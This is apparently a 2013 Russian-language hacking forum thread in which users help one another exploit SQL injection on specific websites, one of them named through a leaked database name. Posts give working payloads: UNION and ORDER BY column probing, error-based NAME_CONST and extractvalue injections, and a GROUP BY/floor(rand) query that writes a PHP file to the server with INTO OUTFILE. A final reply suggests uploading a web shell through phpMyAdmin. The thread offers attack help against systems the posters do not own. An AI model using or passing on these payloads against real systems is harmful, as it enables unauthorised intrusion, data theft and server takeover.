15.07.2013, 02:34
|
|
Участник форума
Регистрация: 23.06.2013
Сообщений: 103
С нами:
6783446
Репутация:
45
|
|
Сообщение от Voinmraka
то придется подбирать имя таблицы и поля?
Если эти значения, включая и ип передаются через POST, можно попробовать вручную вызвать ошибку, в которой будет выведена интересующая информация, конечно если там и ' не фильтруются.
|
|
|
15.07.2013, 02:56
|
|
Новичок
Регистрация: 23.11.2010
Сообщений: 25
С нами:
8141366
Репутация:
0
|
|
какие бы я запросы не вводил в уязвимый параметр все равно все остается также как я написал выше, разве что время меняется...
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]SELECT[/COLOR][COLOR="#007700"]*[/COLOR][COLOR="#0000BB"]FROM[/COLOR][COLOR="#007700"]`[/COLOR][COLOR="#DD0000"]ap_form_-1_review[/COLOR][COLOR="#007700"]`[/COLOR][COLOR="#0000BB"]WHERE id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#0000BB"]Query failed[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]Table[/COLOR][COLOR="#DD0000"]'zodiacsi_formy.ap_form_-1_review'[/COLOR][COLOR="#0000BB"]doesn[/COLOR][COLOR="#DD0000"]'t exist[/COLOR][/COLOR]
еще нашел вот это... есть параметр id= если туда ввести значение -1 то выйдет вот это |
|
|
|
16.07.2013, 08:52
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами:
9176038
Репутация:
8
|
|
Сообщение от Voinmraka
какие бы я запросы не вводил в уязвимый параметр все равно все остается также как я написал выше, разве что время меняется...
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]SELECT[/COLOR][COLOR="#007700"]*[/COLOR][COLOR="#0000BB"]FROM[/COLOR][COLOR="#007700"]`[/COLOR][COLOR="#DD0000"]ap_form_-1_review[/COLOR][COLOR="#007700"]`[/COLOR][COLOR="#0000BB"]WHERE id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#0000BB"]Query failed[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]Table[/COLOR][COLOR="#DD0000"]'zodiacsi_formy.ap_form_-1_review'[/COLOR][COLOR="#0000BB"]doesn[/COLOR][COLOR="#DD0000"]'t exist[/COLOR][/COLOR]
еще нашел вот это... есть параметр id= если туда ввести значение -1 то выйдет вот это Хм, интересный случай... А если ввести так...
Код:
Сначала поищем количество полей в таблице
ap_form_1_review
id=1` order by 1 --
id=1` order by 100 --
id=1` union select 1,2,3,4,5 --
Ну или попробовать вариант с error-based
Код:
id=1` union select * from(select * from(select NAME_CONST((select version()), 14)d) as t join (select NAME_CONST((select version()), 14)e) b)a --
А вообще хотелось бы увидеть линк в ПМ, можно поэкспериментировать...
|
|
|
|
16.07.2013, 09:01
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
С нами:
8417113
Репутация:
0
|
|
Сообщение от BigBear
Хм, интересный случай... А если ввести так...
Код:
Сначала поищем количество полей в таблице
ap_form_1_review
id=1` order by 1 --
id=1` order by 100 --
id=1` union select 1,2,3,4,5 --
Так же не будет работать, если правильную таблицу указать, например:
Код:
id=1_review` SQL -- 1
Voinmraka, у вас же инъекция в имени таблицы...
|
|
|
|
16.07.2013, 11:41
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами:
9176038
Репутация:
8
|
|
Сообщение от XAMEHA
Так же не будет работать, если правильную таблицу указать, например:
Код:
id=1_review` SQL -- 1
Voinmraka
, у вас же инъекция в имени таблицы... SELECT * FROM `ap_form_-1_review`
Хм, точно, просмотрел что там ещё окончание таблицы дописывается.
Ну значит просто добавлять
id=1_review` order by 1 --
и по аналогии
|
|
|
|
17.07.2013, 08:00
|
|
Участник форума
Регистрация: 05.03.2013
Сообщений: 194
С нами:
6941846
Репутация:
-7
|
|
Подскажите пожалуйста, как в MySQL выполнить запрос into outfile в такой конструкции:
script.php?id=(1)and(extractvalue(0x3b,concat(0x3b ,(select+version()))))
Имею мускуль рута и не экранирующиеся кавычки, команда load_file() работает нормально, но как только я пытаюсь сделать следующий запрос:
script.php?id=(1)and(extractvalue(0x3b,concat(0x3b ,(select+user+from+table+into+outfile+'C:\tmp\test .php')))) мускуль мне выдаёт ошибку:
Код:
...блаблабла MySQL server version for the right syntax to use near 'into outfile 'C:\tmp\test.php'))))and'
На сервере винда, и интерпретатор ASP, а база данных мускуль.... есть ли возможность записи в файл в подобном случае? |
|
|
|
17.07.2013, 08:44
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
С нами:
8417113
Репутация:
0
|
|
Сообщение от Грабитель
На сервере винда, и интерпретатор ASP, а база данных мускуль.... есть ли возможность записи в файл в подобном случае?
Нет смысла использовать extractvalue при записи(При чтении - да) в файл в error-based инъекциях, дейлайте как это обычно делается...
|
|
|
|
17.07.2013, 08:50
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами:
9176038
Репутация:
8
|
|
Сообщение от Грабитель
Подскажите пожалуйста, как в MySQL выполнить запрос into outfile в такой конструкции:
script.php?id=(1)and(extractvalue(0x3b,concat(0x3b ,(select+version()))))
Имею мускуль рута и не экранирующиеся кавычки, команда load_file() работает нормально, но как только я пытаюсь сделать следующий запрос:
script.php?id=(1)and(extractvalue(0x3b,concat(0x3b ,(select+user+from+table+into+outfile+'C:\tmp\test .php')))) мускуль мне выдаёт ошибку:
Код:
...блаблабла MySQL server version for the right syntax to use near 'into outfile 'C:\tmp\test.php'))))and'
На сервере винда, и интерпретатор ASP, а база данных мускуль.... есть ли возможность записи в файл в подобном случае? Насколько я помню, при extractvalue не действует способ into outfile.
Попробуй так
Код:
or (select count(*) from (select 1 union select 2 union select 3)x group by concat((select 1 into outfile '/usr/home/www/test.php' lines terminated by ""),floor(rand(0)*2)))
Судя по всему с пробелами у тебя запара. Но, думаю, в "скобочный" вариант переделать сам сможешь.
|
|
|
|
19.07.2013, 23:52
|
|
Познающий
Регистрация: 06.04.2009
Сообщений: 30
С нами:
8999608
Репутация:
0
|
|
Есть доступ к сайту через Phpmyadmin пользователь sa что там можно сделать? Injection в сам PHPMYADMIN можно затеять?
|
|
|
|
20.07.2013, 00:28
|
|
Постоянный
Регистрация: 12.10.2011
Сообщений: 569
С нами:
7676246
Репутация:
94
|
|
Сообщение от kcash
Есть доступ к сайту через Phpmyadmin пользователь sa что там можно сделать? Injection в сам PHPMYADMIN можно затеять?
Если есть права на запись, то можно залить минишелл.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
